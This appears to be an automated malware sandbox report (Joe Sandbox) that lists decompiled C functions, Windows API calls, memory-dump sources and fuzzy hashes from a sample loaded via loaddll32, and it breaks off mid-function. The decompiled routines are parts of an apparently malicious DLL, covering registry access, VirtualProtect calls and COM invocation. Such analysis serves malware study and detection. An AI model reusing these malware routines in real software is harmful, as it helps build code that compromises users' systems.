                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • wcstombs.NTDLL ref: 01C11502
                • GetLastError.KERNEL32 ref: 01C11518
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$AllocateHeapwcstombs
                • String ID:
                • API String ID: 2631933831-0
                • Opcode ID: ac003e999dc5c522cd9aea76ea414cfea4a22f153045f4c5ab80cb8599619a7f
                • Instruction ID: a34697f35dd17d98ec64a66fe183e8d18d665ab947f291d51a68d7e2db86231d
                • Opcode Fuzzy Hash: ac003e999dc5c522cd9aea76ea414cfea4a22f153045f4c5ab80cb8599619a7f
                • Instruction Fuzzy Hash: 7D312BB5940209EFDB20DFE5CC80DAEBBB8FB19304F584469E642E3254D734DB44AB20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C12638 Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E01C12638(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x1c1a290, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E01C17A9C(_t57 - _a4, _a4, _t48);
							_t38 = E01C17A9C(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E01C17A9C(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                0x01c12640
                0x01c12645
                0x01c12647
                0x01c1264e
                0x01c12660
                0x01c12660
                0x01c12664
                0x01c12666
                0x01c12669
                0x01c1266c
                0x01c12675
                0x01c1267f
                0x01c12683
                0x01c12688
                0x01c12698
                0x01c1269e
                0x01c126a2
                0x01c126f1
                0x01c126a4
                0x01c126a4
                0x01c126ad
                0x01c126bc
                0x01c126c1
                0x01c126ce
                0x01c126d7
                0x01c126e2
                0x01c126e9
                0x01c126ed
                0x01c126ed
                0x01c126a2
                0x01c126f8
                0x01c126ff

                APIs
                • lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 01C1266C
                • StrStrA.SHLWAPI(00000000,?), ref: 01C12679
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 01C12698
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrlen
                • String ID:
                • API String ID: 556738718-0
                • Opcode ID: 61c4598b781d091e5f6bd31df05954788a3546807ed84e50557537a210d58ca8
                • Instruction ID: dc40d89ff7da36d40a00ad70d2364d8d0179c457d4c17e0440a46fa7236bf5f7
                • Opcode Fuzzy Hash: 61c4598b781d091e5f6bd31df05954788a3546807ed84e50557537a210d58ca8
                • Instruction Fuzzy Hash: DE215E3664025AEFCF11CF6CC884B9EBFB5EF96254F148195E804AB349C734DA15DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DA2DD Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046E41CF: lstrlen.KERNEL32(?,00000000,046E249E,00000027,046EE268,?,00000000,?,?,046E249E,?,00000001,?,046DA7DD,00000000,?), ref: 046E4205
                  • Part of subcall function 046E41CF: lstrcpy.KERNEL32(00000000,00000000), ref: 046E4229
                  • Part of subcall function 046E41CF: lstrcat.KERNEL32(00000000,00000000), ref: 046E4231
                • RegOpenKeyExA.KERNELBASE(046CF629,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,046CF629,80000001,?,046DE99E), ref: 046DA324
                • RegOpenKeyExA.ADVAPI32(046CF629,046CF629,00000000,00020019,80000001,?,046CF629,80000001,?,046DE99E), ref: 046DA33A
                • RegCloseKey.ADVAPI32(80000001,80000001,?,046DE99E,046DE9AE,?,046CF629,80000001,?,046DE99E), ref: 046DA383
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Open$Closelstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 4131162436-0
                • Opcode ID: ef046bd967179cd5bb62b3fabedfe4b29149e0b87946b90711167cdb73a25f0f
                • Instruction ID: 81156a0e7ad0896ea0334977819e3bf1a6ace6d7ada0b1a8d4a3d935b336ae2e
                • Opcode Fuzzy Hash: ef046bd967179cd5bb62b3fabedfe4b29149e0b87946b90711167cdb73a25f0f
                • Instruction Fuzzy Hash: 3E214D71900219BFDB01DFE5DD81CAEBBBDEB19344B11406AE504E7251F771AE44DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C11590 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                Download Yara Rule
                C-Code - Quality: 47%
                			E01C11590(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E01C12114(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x1c192a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                0x01c11594
                0x01c115a1
                0x01c115a3
                0x01c115a4
                0x01c115ac
                0x01c115ac
                0x01c115b0
                0x00000000
                0x00000000
                0x01c115a7
                0x01c115a8
                0x01c115ab
                0x01c115ab
                0x01c115b8
                0x01c115bf
                0x01c115c2
                0x01c115ca
                0x01c115d0
                0x01c115d2
                0x01c115d5
                0x01c115d9
                0x01c115db
                0x01c115de
                0x01c115de
                0x01c115df
                0x01c115e1
                0x01c115de
                0x01c115eb
                0x01c115ee
                0x01c115f1
                0x01c115f4
                0x01c115f4
                0x01c115fb
                0x01c115fb
                0x01c11607

                APIs
                • StrChrA.SHLWAPI(?,00000020,00000000,021795AC,?,?,01C121E5,?,021795AC), ref: 01C115AC
                • StrTrimA.KERNELBASE(?,01C192A4,00000002,?,01C121E5,?,021795AC), ref: 01C115CA
                • StrChrA.SHLWAPI(?,00000020,?,01C121E5,?,021795AC), ref: 01C115D5
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Trim
                • String ID:
                • API String ID: 3043112668-0
                • Opcode ID: cb0ed091b20c7d155b1534a1babeb48303765e270fdb5d52500a383e5f0fe101
                • Instruction ID: 5f8c2d5d86cbb955ba0716a834138ea2a0c1bed2de606867d4c8678bb9e69d16
                • Opcode Fuzzy Hash: cb0ed091b20c7d155b1534a1babeb48303765e270fdb5d52500a383e5f0fe101
                • Instruction Fuzzy Hash: 1D019E72380345EFE7208A7B8C45F677E9DEB8B690F1C0021AB46CB24AD934C902E760
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C9F9A Relevance: 4.5, APIs: 3, Instructions: 49memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(046ED514,00000000,?,?,?,046C6E33,00000000,?,?,046ED514,?,046EA590,00000018,046CB772,00000000,00000002), ref: 046C9FCC
                • VirtualProtect.KERNELBASE(046ED514,00000004,00000040,00000000,00000000,00000000,?,?,?,046C6E33,00000000,?,?,046ED514,?,046EA590), ref: 046C9FE6
                • VirtualProtect.KERNELBASE(046ED514,00000004,00000000,00000000,?,?,?,046C6E33,00000000,?,?,046ED514,?,046EA590,00000018,046CB772), ref: 046CA019
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ProtectVirtual$lstrlen
                • String ID:
                • API String ID: 386137988-0
                • Opcode ID: 7590615174a97100e117a592213a6b290b6a546fff43133be02a6ae56b4a2e85
                • Instruction ID: 87aef34b072cb51cb996ff9c985e7542cdd33c75ca5ae7f76b973e8c93dc469a
                • Opcode Fuzzy Hash: 7590615174a97100e117a592213a6b290b6a546fff43133be02a6ae56b4a2e85
                • Instruction Fuzzy Hash: 31113075900208EFEB11CF85C485FEEBFB8EF15358F108049EA049B201E379EA84DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C16096 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E01C16096(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E01C12D2F(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x1c1a2d8; // 0x55d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x1c1b4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x1c1b8f0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E01C16CFD();
					_push( &_v64);
					if( *0x1c1a100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E01C16CFD();
				}
				return _t28;
			}















                0x01c16096
                0x01c1609d
                0x01c160a6
                0x01c160ab
                0x01c160af
                0x01c160b9
                0x01c160be
                0x01c160c3
                0x01c160cb
                0x01c160d2
                0x01c160dc
                0x01c160dc
                0x01c160d4
                0x01c160d4
                0x01c160d4
                0x01c160d4
                0x01c160e2
                0x01c160e8
                0x01c160e9
                0x01c160ec
                0x01c160ef
                0x01c160f2
                0x01c160fa
                0x01c16103
                0x01c1610b
                0x01c1610b
                0x01c1610d
                0x01c1610f
                0x01c1610f
                0x01c16119

                APIs
                  • Part of subcall function 01C12D2F: SysAllocString.OLEAUT32(00000000), ref: 01C12D8B
                  • Part of subcall function 01C12D2F: SysAllocString.OLEAUT32(0070006F), ref: 01C12D9F
                  • Part of subcall function 01C12D2F: SysAllocString.OLEAUT32(00000000), ref: 01C12DB1
                  • Part of subcall function 01C12D2F: SysFreeString.OLEAUT32(00000000), ref: 01C12E15
                • memset.NTDLL ref: 01C160B9
                • GetLastError.KERNEL32 ref: 01C16105
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$Alloc$ErrorFreeLastmemset
                • String ID: <
                • API String ID: 1330562889-4251816714
                • Opcode ID: 0b178ff6a6e102a0943adb9a59cfb2ebc758e6f3db588792f6f172c0a98c269a
                • Instruction ID: 7c608667203ed18d857cc5df78fe457f24eb4d45e3986e41b9f4c55df2ee9131
                • Opcode Fuzzy Hash: 0b178ff6a6e102a0943adb9a59cfb2ebc758e6f3db588792f6f172c0a98c269a
                • Instruction Fuzzy Hash: 35018071D80228EFDB10EFA9D884FCE7BF8BB1A650F404166F904E7205D7B0D904ABA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CD0E6 Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                Download Yara Rule
                APIs
                • RegCreateKeyA.ADVAPI32(80000001,04C9B7F0,?), ref: 046CD0FB
                • RegOpenKeyA.ADVAPI32(80000001,04C9B7F0,?), ref: 046CD105
                • lstrlen.KERNEL32(04C9B7F0,00000000,00000000,046ED06E,?,?,?,046C902F,00000001,?), ref: 046CD124
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CreateOpenlstrlen
                • String ID:
                • API String ID: 2865187142-0
                • Opcode ID: d6e797d303fae10f2e4e1a876a76791d514446ecec5f249bfb8f422cbfee8031
                • Instruction ID: 88bad8ee819b91ddcd3d1e424ad79ef61b30daaa2ccc3cf4117616572e058f04
                • Opcode Fuzzy Hash: d6e797d303fae10f2e4e1a876a76791d514446ecec5f249bfb8f422cbfee8031
                • Instruction Fuzzy Hash: C5F03676100208BFEB119F91DC85FAB7BBCEB457A4F10801AFD459A240F6B4BA80C761
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CE024 Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                Download Yara Rule
                APIs
                • SetEvent.KERNEL32(0000043C,046E3A8C), ref: 046CE02E
                  • Part of subcall function 046C609C: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,046CE039), ref: 046C60C5
                  • Part of subcall function 046C609C: RtlDeleteCriticalSection.NTDLL(046EE460), ref: 046C60F8
                  • Part of subcall function 046C609C: RtlDeleteCriticalSection.NTDLL(046EE480), ref: 046C60FF
                  • Part of subcall function 046C609C: ReleaseMutex.KERNEL32(00000448,00000000,?,?,?,046CE039), ref: 046C6128
                  • Part of subcall function 046C609C: CloseHandle.KERNEL32(?,?,046CE039), ref: 046C6134
                  • Part of subcall function 046C609C: ResetEvent.KERNEL32(00000000,00000000,?,?,?,046CE039), ref: 046C6140
                  • Part of subcall function 046C609C: CloseHandle.KERNEL32(?,?,046CE039), ref: 046C614C
                  • Part of subcall function 046C609C: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,046CE039), ref: 046C6152
                  • Part of subcall function 046C609C: SleepEx.KERNEL32(00000064,00000001,?,?,046CE039), ref: 046C6166
                  • Part of subcall function 046C609C: HeapFree.KERNEL32(00000000,00000000,?,?,046CE039), ref: 046C618A
                  • Part of subcall function 046C609C: RtlRemoveVectoredExceptionHandler.NTDLL(01333FC8), ref: 046C61C0
                  • Part of subcall function 046C609C: SleepEx.KERNEL32(00000064,00000001,?,?,046CE039), ref: 046C61DC
                • CloseHandle.KERNEL32(0000043C), ref: 046CE043
                • HeapDestroy.KERNELBASE(048A0000), ref: 046CE053
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                • String ID:
                • API String ID: 2773679374-0
                • Opcode ID: 4f1b6b7bc484d466d8e50d65552d20e3385ebf0fdee1f1ac1da2ffab5bdebf06
                • Instruction ID: d797dc56aa795d66d78c57f5fafb08f9495e64c5f0895427bf4d32ad24ee51a7
                • Opcode Fuzzy Hash: 4f1b6b7bc484d466d8e50d65552d20e3385ebf0fdee1f1ac1da2ffab5bdebf06
                • Instruction Fuzzy Hash: 5AE062747016019BEB60AF76E94CB2637E8EB546413482828B515DB590FB2EEC509A74
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C11A55 Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C11A55(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E01C12114(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x1c1a330, 0x110);
					_t27 =  *0x1c1a334; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E01C14B70(0x110, _a4, _t27, 0);
					}
					if(E01C16D8B( &_v36) != 0) {
						_t35 = E01C178F2(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E01C124F7(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0xbf0845c7
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E01C12C11(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E01C12C11(_a4);
				}
				return _v16;
			}
















                0x01c11a5b
                0x01c11a60
                0x01c11a6d
                0x01c11a70
                0x01c11a73
                0x01c11a7a
                0x01c11a7d
                0x01c11a8b
                0x01c11a90
                0x01c11a95
                0x01c11a9a
                0x01c11a9c
                0x01c11aa4
                0x01c11aa4
                0x01c11ab3
                0x01c11ac8
                0x01c11acf
                0x01c11ad6
                0x01c11adc
                0x01c11ae2
                0x01c11aea
                0x01c11af0
                0x01c11af3
                0x01c11b00
                0x01c11b05
                0x01c11b09
                0x01c11b09
                0x01c11acf
                0x01c11b14
                0x01c11b1f
                0x01c11b1f
                0x01c11b2b

                APIs
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • memcpy.NTDLL(00000000,00000110,?,?,?,?,01C14F92,?,01C17307,01C17307,?), ref: 01C11A8B
                • memset.NTDLL ref: 01C11B00
                • memset.NTDLL ref: 01C11B14
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memset$AllocateHeapmemcpy
                • String ID:
                • API String ID: 1529149438-0
                • Opcode ID: 5098544d077398dd307338594893f8c041d0f6d5ae96116c12c16fef69c910ea
                • Instruction ID: 50c1eed3b17f17cbe7566b2b3b9482878bd1ca8fa1a43d9cb750d14fd0aad2e5
                • Opcode Fuzzy Hash: 5098544d077398dd307338594893f8c041d0f6d5ae96116c12c16fef69c910ea
                • Instruction Fuzzy Hash: 5F217F75A40219EBDF11AFA9CC41FEE7BB8EF5A600F044055F904E7245E738D600EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C13035 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E01C13035(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E01C1134A(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x1c1a2d8; // 0x55d5a8
						_t9 = _t17 + 0x1c1ba3c; // 0x444f4340
						_t20 = E01C12638( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x1c1a290, 0, _a4); // executed
					}
				}
				return _t26;
			}








                0x01c13038
                0x01c1303e
                0x01c13095
                0x01c13044
                0x01c1304f
                0x01c13054
                0x01c13058
                0x01c13065
                0x01c1306d
                0x01c13079
                0x01c13081
                0x01c1308b
                0x01c1308b
                0x01c13058
                0x01c1309a

                APIs
                  • Part of subcall function 01C1134A: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01C11362
                  • Part of subcall function 01C12638: lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 01C1266C
                  • Part of subcall function 01C12638: StrStrA.SHLWAPI(00000000,?), ref: 01C12679
                  • Part of subcall function 01C12638: RtlAllocateHeap.NTDLL(00000000,?), ref: 01C12698
                • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,01C120B3), ref: 01C1308B
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Allocate$Freelstrlen
                • String ID: Ut
                • API String ID: 2220322926-8415677
                • Opcode ID: 70acc0af0617894ae3af09d78bb9ca5111350bc4034682deec2b0808c401dbf3
                • Instruction ID: 2966b1b2e09a35e06aa497558a1da921454279a7c1b21c37cc82db59c0190a01
                • Opcode Fuzzy Hash: 70acc0af0617894ae3af09d78bb9ca5111350bc4034682deec2b0808c401dbf3
                • Instruction Fuzzy Hash: 6301AD36180108FFDB228F59CC04EDA7BE9FB55264F108024FA0E86164E731EA44EB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C12C11 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C12C11(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x1c1a290, 0, _a4); // executed
				return _t2;
			}




                0x01c12c1d
                0x01c12c23

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Ut
                • API String ID: 3298025750-8415677
                • Opcode ID: 398f49cf943a8e2cfc61b87a8539299b3d900169c4f148c13390ef9ee00ab420
                • Instruction ID: cd90ccc37b240c98fa930fc4870300a84a25a597e3e2ded63090c9f79508ab40
                • Opcode Fuzzy Hash: 398f49cf943a8e2cfc61b87a8539299b3d900169c4f148c13390ef9ee00ab420
                • Instruction Fuzzy Hash: DDB01231084110ABCA224B00DD08F457B22B775B00F004010B20E40068C233C420EB09
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C163FF Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 38%
                			E01C163FF(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x1c1a2d8; // 0x55d5a8
				_t4 = _t49 + 0x1c1b44c; // 0x21789f4
				_t5 = _t49 + 0x1c1b43c; // 0x9ba05972
				_t51 =  *0x1c1a140(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x1c1a2d8; // 0x55d5a8
						_t30 = _t56 + 0x1c1b42c; // 0x21789d4
						_t31 = _t56 + 0x1c1b45c; // 0x4c96be40
						_t58 =  *0x1c1a114(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
